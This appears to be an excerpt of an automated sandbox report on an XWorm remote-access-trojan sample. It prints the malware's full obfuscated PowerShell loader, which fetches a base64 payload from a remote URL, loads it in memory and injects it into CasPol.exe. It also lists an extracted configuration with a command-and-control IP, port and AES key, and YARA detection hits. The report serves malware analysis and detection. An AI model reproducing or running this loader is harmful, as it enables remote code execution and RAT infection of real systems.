"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{0 }url = {1} https'+':/ /ia60'+'01 00.us.arch i'+'ve.org '+'/24/i'+ 'tems'+'/d '+'et'+'a' +'h-note-v /Detah'+'N oteV'+'.tx t{1};{0'+' }base64Co' +'ntent '+ '='+' '+'( New-Ob'+'j ect Sy'+'s t'+'em.Ne' +'t.W'+'eb Clie'+'nt) .'+'Downl' +'oadSt'+' rin'+'g({0 '+'}'+'url );{'+'0}bi n'+'ar'+'y Con'+'ten' +'t ='+' ' +'[System. Convert]'+ '::'+'From Ba'+'se64S tring({0}b ase'+'64Co n'+'tent); {0}asse'+' mbl'+'y '+ '='+' [Ref lection.As '+'s'+'emb ly]::'+'Lo '+'ad({0}b ina'+'ryCo ntent);{0} typ'+'e '+ '= {'+'0}' +'assem'+' bly.GetT'+ 'yp'+'e({1 }R'+'unPE' +'.Ho'+'me {'+'1});{0 '+'}'+'me' +'thod = { 0}type.Get Method({1} VA'+'I{1}' +');{0}'+' m'+'e'+'th '+'od.In'+ 'v'+'oke({ 0}nu'+'ll, [obje'+'c t['+']]'+' @({1}'+'0' +'/gJ1k'+' S'+'/d/'+' ee.e'+'tsa p//:sptth{ 1'+'}'+' , '+' {1}de' +'sat'+'iv ado{1'+'}' +' , {1'+' }desativa' +'d'+'o{1} , {1}'+'d e'+'sativa do{'+'1},{ 1}C'+'a'+' sPo'+'l{1} '+',{1'+'} {'+'1}))') -f [chAR]3 6,[chAR]39 ) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - CasPol.exe (PID: 7228 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
{"C2 url": ["135.224.23.113"], "Port": "5555", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
Click to see the 4 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
Click to see the 5 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |